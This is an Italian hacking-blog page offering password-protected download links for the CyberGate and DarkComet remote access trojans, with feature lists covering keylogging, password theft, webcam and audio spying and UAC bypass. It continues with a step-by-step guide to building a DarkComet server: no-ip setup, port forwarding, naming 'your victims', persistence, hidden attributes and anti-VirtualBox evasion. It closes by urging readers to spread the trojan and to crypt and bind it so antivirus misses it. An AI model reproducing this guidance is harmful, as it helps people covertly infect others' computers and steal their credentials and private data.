giovedì 8 aprile 2010

CyberGate 1.4.8 - Remote Administration Tool

CyberGate è un potente RAT (Remote Administration Tool) che funziona su tutti i sistemi operativi Windows, che viene continuamente sviluppato dal team di Cyber-Sec.org
CyberGate è stato costruito per essere uno strumento utile per chi ha necessità di gestire spesso computer remoti.
CyberGate è leggero, portatile e di facile utilizzo ed è attualmente considerato uno dei migliori software per il controllo remoto...
La Release 1.4.8 è una versione migliorata della 1.4 Private Edition, rilasciata pubblicamente dopo che quest'ultima è stata crakkata da alcuni hacker...
[DOWNLOAD]
LINK VERIFICATO: (Consigliato) [Cos'è?]
Password: hackeritalia.blogspot.com
http://sharecash.org/download.php?file=599015
LINK NON VERIFICATO: (NON SICURO)
n.d.

[/DOWNLOAD]

[+] FEATURES LIST :

- Connessione Inversa
- Traffico Crittografato 64 bit
- Supporto multi-porte
- Binder
- Icon Changer
- Supporto Salvataggio log su server FTP
- Automatic DNS updater
- UAC (Vista and Seven protection) bypass
- Keylogger
- Password recovery tool (browser, msn, windows...)
- Chat feature
- File manager
- Registry editor
- Services manager
- Windows manager
- Processes manager
- Clipboard manager
- Socks 4/5 Proxy
- Http Proxy
- Desktop remoto
- Visualizza webcam remota
- Cattura audio
- Download Remoto e Esecuzione Remota
- DOS prompt
- Invia Messaggi
- Lista Porte Attive
- Remote open HTTP url
- CD Apri e Chiudi
- Remote Power Options (Shutdown, Restart, etc)
- Remote Mouse Lock
- Remote Keyboard Lock
- Remote Icons Hide/show
- Remote Start Hide/show
- multi-user keylloger/file search;

mercoledì 31 marzo 2010

DarkComet 2.0 RC4 - RAT


DarkComet-RAT (Remote Administration Tool) è un potente e stabile RAT(Remote administration Tool) che ti permette di controllare computer remoti in modo semplice e veloce , puoi vedere il desktop, la webcam, controllare i processi remoti, ascoltare i suoni etc... allo stesso tempo e con una velocità elevata , DarkComet può lavorare in LAN ( Local Area Network ) e WAN ( Wide Area Network ) .
DarkComet è compatibile con Windows 2000 , Windows XP (all sp), Windows Vista (all sp) and Windows Seven, sia 32(.386) che 64 bit .

[DOWNLOAD]
LINK VERIFICATO: (Consigliato) [Cos'è?]
Password: hackeritalia.blogspot.com
http://sharecash.org/download.php?file=562957

LINK NON VERIFICATO: (NON SICURO)
n.d.

[/DOWNLOAD]

Caratteristiche: (Features)
-SYSTEM INFO (informazioni sul pc-vittima)
-FUN FUNCTIONS (funzioni divertenti)
-SYSTEM FUNCTIONS:
-Process Manager; (modifica i processi remoti)
-Remote Registry; (cambia i valori del registro di windows)
-Remote Shell; (invia comandi al pc)-Window Functions (controlla le finestre attive)
-Unistall Applications (Disinstalla i software del pc remoto)
-Remote MSConfig (Cambia le impostazioni di avvio)
-Remote Scripting (Esegui script in vari linguaggi nel pc remoto)
-Files Functions (File Manager[Upload/Download] e Search Manager)
-Password (Visualizza le password di MSN,Firefox,IE7 ed i log di utorrent)
-Msn Functions (Controlla MSN e visualizza i contatti)
-Spy Functions (Controlla Webcam e Suoni, Controlla il Desktop, Keylogger ONline/OFFline)
-Network Functions (Url Download, visualizzazione remota delle pagine web, redirect)
-Misc Functions (Controlla stampante, messaggi)-Quick Actions (varie funzioni di controllo remoto)
-Log(log della sessione)
-Other
GUIDA: (i link contengono un breve pagina pubblicitaria)
Requisiti:
1. Un account no-ip e scarica NO-IP DUC... Se non ne hai uno crealo segui questa guida: Crea account No-ip

2. Scarica Simple Port Forwarding ed apri la porta 1604 sul tuo router.(se non dovesse funzionare prova a cambiarla manualmente dalla pagina 192.168.1.1[la pagina potrebbe essere diversa]).
-----------------------------------------------------------------------------------------------
[in alcuni casi potrebbe essere necessario disattivare temporaneamente l'antivirus per poter utilizzare il programma]

1.) Scarica Darkcomet 2.0 dal link presente nel post
2.)Scompatta l'archivio e apri il programma . Si dovrebbe aprire un disclaimer:
- spunta la casella "Do not show again" e clicca "I Agree"
3)Ora dobbiamo configurare il RAT in modo che ascolti una determinata porta:
-Clicca "Connection">"Add Socket" ; dovrebbe aprirsi una finestra simile a questa:


4) Lascia le impostazioni come sono e clicca "Listen"
5)Adesso dobbiamo creare il server:
1- Clicca "Edit Server" e dovrebbe apparire una finestra con varie impostazioni:
2-"Edit Server Session": lascia così che serve solo se hai già creato almeno una configurazione...
3-"Main Setting"....
- "Mutex Name": " Clicca Random"
- "Server ID": Scegli un nome da dare alle tue vittime ;-)
- "Protect server connection by password": se vuoi impostare una password per accedere ai pc remoti > non impostarla almeno che tu non abbia un account condiviso.
-"Random Range Instance": Lascia i valori predefiniti...
-"Edit Server Methode":
-EOF "Stabile ma è difficile trovare un buon crypter per criptarlo"
-RES "Tutti i crypter funzionano utilizzando questo metodo" [CONSIGLIATO]
4) Connection Setting:
- Nel campo "IP Address" metti il tuo no-ip (ex: example.no-ip.org)
- Nel campo "Port" lascia la porta di default
5)Server Startup:
Seleziona tutto ("Melt Server" = facoltativo[cancella il file dopo aver installato il server])...
e cambia i valori in questi campi:
-Installation Path: Scegli dove vuoi installare il server
-Intall in Registry Startup: installa il server nel registro di windows
-Install in Windows Services: installa il server come servizio di sistema
-Install with ActiveX Startup: installa il server come ActiveX (clicca Random)
6)Server Shield:
-File Attribute e Parent Folder Attribute: Hidden, System, Read Only.
-Disable Functions: disabilita detrminate funzioni nel pc remoto ;-)
- Spunta la casella Hide Partialy Process
7) Anti VirtualBox:
Spunta la casella "Active Anti VirtualBox" e "Fake Run"
8)Icon Setting: se vuoi cambiare icona al server
9)Generate Server: Spunta le caselle "Active Offline Keylogger at server startup" e "I Accept the DarkComet-RAT EULA" poi clicca "Create Server".

Ok, finalmente puoi iniziare a diffondere il tuo trojan(RAT)... ;-)
ti consiglio di criptarlo e unirlo ad altri file per renderlo invisibile agli anti-virus:
Per trovare il programma adatto cerca con Google "FUD Binder" e "FUD Crypter"
Puoi controllare quanti antivirus individuano il tuo virus SOLO QUI: Novirusthanks.org
[IMPORTANTE: Prima di cliccare "Submit File" spunta la casella "Do not distribute the sample"]

Divertiti !!! ;-)
Guida Scritta Da iBlack, se vuoi pubblicare questa guida posta un link a questo Blog